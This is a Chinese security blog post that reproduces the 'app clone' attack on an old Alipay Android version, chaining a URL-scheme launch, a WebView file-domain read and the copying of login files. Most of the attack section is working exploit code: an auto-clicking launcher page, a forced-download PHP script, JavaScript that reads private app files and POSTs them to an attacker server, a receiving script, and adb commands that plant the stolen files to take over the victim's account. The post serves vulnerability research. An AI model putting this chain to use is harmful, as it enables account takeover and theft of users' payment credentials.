支付宝克隆攻击原理分析与复现
2019-08-12 19:01:00 Author: mp.weixin.qq.com(查看原文) 阅读量:92 收藏

前言

该漏洞由腾讯玄武实验室发现

这个应用克隆攻击方式是多个漏洞所组成的攻击链

本文以支付宝为例,分析并复现此次克隆攻击

ps. 看了无数遍漏洞公告和演示视频,一点一点完善对利用过程的猜想,终于复现成功...

支付宝旧版本下载:

http://app.cnmo.com/android/105072/history.html
https://www.hackhome.com/zt/zfbjbbdq/xiazai/

测试环境:

支付宝10.0.12

攻击者:Nexus 5 + Macbook pro

被攻击者:Nexus 6p + Chrome

注意
复现漏洞时请删除被攻击者支付宝应用目录下的热补丁
即删掉/data/data/com.eg.android.AlipayGphone/目录下files/apatch/和files/hotpatch/中的文件
这个问题坑了我好久。。。

攻击阶段1 - URL Scheme攻击

通过将自定义URI方案设置src为如下所示,可以通过在页面中嵌入iframe来实现打开应用程序

<iframe src="paulsawesomeapp://page1">

这适用于Android版Chrome浏览器,版本18及更早版本。
适用于Android的Chrome版本25及更高版本的功能略有改变。通过设置iframe的src属性不再可能启动Android应用程序。
但是使用a标签是可以的

并且可以使用a标签+js模拟点击实现自动化打开app的效果

以支付宝为例,反编译apk之后在manifest文件中发现支付宝支持的几个scheme

<data android:scheme="alipayss" /><data android:scheme="alipays" /><data android:scheme="alipayqr" /><data android:scheme="alipayauth" /><data android:scheme="alipayre" /><data android:scheme="https" /><data android:scheme="alipaylite" /><data android:scheme="alipay" android:host="merchantpay" />
问了一下身边专门做安卓开发的同学说应该不存在java代码里动态设置scheme的方法,
所以目标就锁定在了以上几个scheme
问了一下身边专门做安卓开发的同学说应该不存在java代码里动态设置scheme的方法,
所以目标就锁定在了以上几个scheme

于是去查了一下上面几个scheme的相关资料,发现使用如下几个URL Scheme是可以在支付宝中打开Webview的

我也尝试逆向了一下,但是后来发现在网上搜索相关资料就可以找到这个几个scheme的使用方法

ps. 不知道为什么蚂蚁金服的文档中搜不到 https://open.alipay.com/search/searchDetail.htm?keyword=alipayqr

alipayqr://platformapi/startapp?saId=10000007&clientVersion=3.7.0.0718&qrcode=https%3A%2F%2Fqr.alipay.com%2Faescsnt49njcwynkda%3F_s%3Dweb-otheralipays://platformapi/startapp?saId=10000007&clientVersion=3.7.0.0718&qrcode=https%253A%252F%252Fqr.alipay.com%252Fbax041244dd0qf8n6ras805b%253F_s%253Dweb-othealipays://platformapi/startapp?appId=20000067&url=http://www.baidu.com

一开始一直以为这个漏洞是利用了安卓Webview的漏洞首先从http域跨到了file域,然后
在file域中进行进一步利用
但是这和腾讯关于漏洞的描述有些冲突,因为说是可以在没有漏洞的安卓系统上进行攻击
于是仔细观察了腾讯的漏洞演示视频,受害者打开链接后有下载文件的过程,这时候才恍然大悟
对Webview的攻击是直接加载的下载到受害者机器上的本地文件,也就是说文件被加载时就已经处于file域中
后来经过测试之后前两个URL Scheme无法加载file域资源
于是构造第一阶段攻击Exp如下:
exp.html
<iframe style="display:none" src="exp.php"></iframe><script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript">  $(function(){function clicksp(){      $("#sp").trigger("click");    }    setTimeout(clicksp, 500);  });</script>
<a href="alipayqr://platformapi/startapp?saId=10000007&clientVersion=3.7.0.0718&qrcode=file:///sdcard/Download/exp2.html"><span id="sp"></span></a>
exp.php
<?php
header("Content-Disposition: attachment; filename=exp2.html");
?>
<h2>Hello Alipay!</h2>

攻击阶段1达到了从网页打开支付宝app,并且下载和加载exp2.html的目的
攻击阶段2 - Webview跨域攻击
因为文件被加载时就已经处于file域中,所以下一步就是读取支付宝保存用户信息的文件,然后回传到攻击者服务器上
通过file域访问file域的资源需要设置API setAllowFileAccessFromFileURLs为true
通过file域访问其他域,如http域的资源,需要设置API setAllowUniversalAccessFromFileURLs为true
关于这两个API的描述可以参考《WEBVIEW跨源攻击分析》这里不再多讲
现在已经可以直接构造读取支付宝本地文件并回传
攻击阶段2的exp如下
修改攻击阶段1的exp.php文件如下
exp.php
<?php
header("Content-Disposition: attachment; filename=exp2.html");
echo file_get_contents('exp2.html');

exp2.html (以读取shared_prefs/welcome.xml为例)
<h2>Hello Alipay!</h2><script>function createXHR(){if(typeof XMLHttpRequest != 'undefined'){return new XMLHttpRequest();    }else if(typeof ActiveXObject != 'undefined'){if(typeof arguments.callee.activeXString != 'string'){var versions = ['MSXML2.XMLHttp.6.0','MSXML2.XMLHttp.3.0','MSXML2.XMLHttp'];for(var i=0;i<versions.length;i++){try{var xhr = new ActiveXObject(versions[i]);arguments.callee.activeXString = versions[i];return xhr;                }catch(ex){}            }        }return new ActiveXObject(arguments.callee.activeXString);    }else{throw new Error('No XHR Object available');    }}// send GET Requestfunction sendGetRequest(url,callback){var xhr  = createXHR();    xhr.open('GET',url,false);    xhr.send();    callback(xhr.responseText);}sendGetRequest('file:///data/data/com.eg.android.AlipayGphone/shared_prefs/welcome.xml', function(response){    alert(response);});</script>

效果如下
攻击阶段2达到了读取支付宝app私有文件的目的
攻击阶段3 - 克隆攻击
2012年黑哥就提到过克隆攻击的思路,可参考《Attack Your Android Apps By Webview》
同一用户使用账号密码登录多个设备支付宝是会被要求进行安全验证的(如选出该账号的好友、短信验证)
但是通过拷贝/data/data/com.eg.android.AlipayGphone下的文件到其他设备的方式,支付宝是不会有安全验证的
猜测支付宝在第一次运行之后就不再判断设备指纹,所以可被克隆攻击。
测试的时候通过删除文件(可以用类似二分法提高效率)的方法逐渐确定和用户登录状态相关的文件
经过一段时间的测试,发现支付宝中与用户登录状态相关的文件有如下几个
├── databases
│   ├── alipayclient.db
│   └── alipayclient.db-journal
├── files
│   └── SGMANAGER_DATA2
└── shared_prefs
    ├── alipay_tid_storage.xml
    └── secuitySharedDataStore.xml
攻击阶段3确定了与支付宝登录状态相关的文件,并读取这些文件回传到攻击者服务器上,攻击者拿到文件后将文件拷贝到攻击机上即可控制被攻击者账户
完整的exp
结合第一阶段、第二阶段和第三阶段的攻击,最终可构造几个exp文件如下
exp.html:
<iframe style="display:none" src="exp.php"></iframe>
<script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript">  $(function(){function clicksp(){      $("#sp").trigger("click");    }    setTimeout(clicksp, 500);  });</script>
<a href="alipayqr://platformapi/startapp?saId=10000007&clientVersion=3.7.0.0718&qrcode=file:///sdcard/Download/exp2.html"><span id="sp"></span></a>

exp.php
<?php
header("Content-Disposition: attachment; filename=exp2.html");
echo file_get_contents('exp2.html');

exp2.html:
<h2>Hello Alipay!</h2>
<script>var server = "http://10.210.38.162:8888/recv.php";
function createXHR(){if(typeof XMLHttpRequest != 'undefined'){return new XMLHttpRequest();    }else if(typeof ActiveXObject != 'undefined'){if(typeof arguments.callee.activeXString != 'string'){var versions = ['MSXML2.XMLHttp.6.0','MSXML2.XMLHttp.3.0','MSXML2.XMLHttp'];for(var i=0;i<versions.length;i++){try{var xhr = new ActiveXObject(versions[i]);arguments.callee.activeXString = versions[i];return xhr;                }catch(ex){}            }        }return new ActiveXObject(arguments.callee.activeXString);    }else{throw new Error('No XHR Object available');    }}
// send POST Requestfunction sendPostRequest(url,data,headers,callback){
var xhr  = createXHR();    xhr.onload = function(){        callback(xhr.responseText);    }    xhr.open('POST',url,false);if(typeof(headers)=='object'){for(var index in headers){if(typeof(headers[index])!='function'){                xhr.setRequestHeader(index,headers[index]);            }        }    }    xhr.send(data);}
// send GET Request to read file and return base64(file_content)function sendGetRequestForB64File(url, filename, callback) {var xhr = createXHR();    xhr.onload = function() {var reader = new FileReader();        reader.onloadend = function() {var result = reader.result;var data = result.substr(result.search('base64,') + 'base64,'.length,result.length);            data = data.replace(/\+/g,'-').replace(/\//g, '_');            callback(filename, data);        }        reader.readAsDataURL(xhr.response);    };    xhr.open('GET', url);    xhr.responseType = 'blob';    xhr.send();}
var files = Array('databases/alipayclient.db','databases/alipayclient.db-journal','files/SGMANAGER_DATA2','shared_prefs/alipay_tid_storage.xml','shared_prefs/secuitySharedDataStore.xml');
var base_path = 'file:///data/data/com.eg.android.AlipayGphone/';

for(var each in files){var file_path = base_path + files[each]    sendGetRequestForB64File(file_path,files[each],function(filename, response){        sendPostRequest(            server,'name=' + escape(filename) + '&' + 'content=' + escape(response),            {"Content-type" : "application/x-www-form-urlencoded"},function(a){}        );    });}</script>

recv.php:
因为我是在内网接收的数据,所以测试时为了方便直接接收参数就写文件了
大佬们把这个脚本丢到自己服务器上测试的时候小心一点,可能会被别人写shell XD
<?php
function base64url_decode($data) {return base64_decode(str_pad(strtr($data, '-_', '+/'), strlen($data) % 4, '=', STR_PAD_RIGHT));}
file_put_contents('/home/dlive/Desktop/exp/clone_attack/'.$_POST['name'], base64url_decode($_POST['content']));

攻击者将从被攻击者手机上窃取的文件拷贝到自己手机上:
adb -s 049219950024a175 install ~/Desktop/clone/apk/alipay.apkadb -s 049219950024a175 shellsuadb -s 049219950024a175 push ~/Desktop/clone/exp/clone_attack/ /sdcard/cp -R /sdcard/clone_attack/* /data/data/com.eg.android.AlipayGphone/chmod -R 777 /data/data/com.eg.android.AlipayGphone/

然后打开app即可
攻击者通过拷贝攻击,无需回答身份验证问题,无需短信验证,即可登录受害者账户,并且无需付款密码即可使用付款码
具体攻击操作可见视频演示(不是很会处理视频,导致视频质量有点差,希望大家不要介意)
https://youtu.be/o6IbSAJUUYo
总结
总的来说这个漏洞原理比较简单,克隆攻击所用到的漏洞类型都是已经在网上被曝出过的,
但是为什么还有如此多的app存在被这种攻击方式攻击的风险,这一点是值得思考的。
整个漏洞利用过程全靠自己猜想验证,如果哪里描述的不准确欢迎交流指正。
参考
  1. 关于Android平台WebView控件存在跨域访问高危漏洞的安全公告
    http://www.cnvd.org.cn/webinfo/show/4365?from=timeline&isappinstalled=0
  2. “应用克隆”攻击模型
    https://mp.weixin.qq.com/s/pQqOLQS_hWfv8btYpYK1xQ
  3. Android安全开发之浅谈网页打开APP
    https://yq.aliyun.com/articles/57088
  4. Webview跨源攻击分析
    http://blogs.360.cn/360mobile/2014/09/22/webview%E8%B7%A8%E6%BA%90%E6%94%BB%E5%87%BB%E5%88%86%E6%9E%90/
  5. Attack Your Android Apps By Webview
    http://blog.knownsec.com/2013/03/attack-your-android-apps-by-webview/
  6. Andorid Intent 与 Chrome
    https://developer.chrome.com/multidevice/android/intents?spm=5176.100239.blogcont57088.9.1c29be50KIPvAG
原文链接:
http://www.0xby.com/169.html
随着Android的普及,其安全性也越来越受到关注。如果你想初步了解Android系统安全,可以来合天网安实验室学习:Android安全基础课程。长按下面二维码,或点击文末“阅读原文”,可预览学习Android安全基础课程(PC端操作最佳哟)
长按开始学习
别忘了投稿哦
大家有好的技术原创文章
欢迎投稿至邮箱:[email protected]
合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦
有才能的你快来投稿吧!
了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!
点击“阅读全文”,开始学习







文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&amp;mid=2652851636&amp;idx=1&amp;sn=5571db34a8fb92e076cf6fa353d2ad88&amp;chksm=bd5931798a2eb86fc3cdfd1f7150cbe99dfab2ce2a55e71e729ca8876db60fd60a3d8228ba40#rd
 如有侵权请联系:admin#unsafe.sh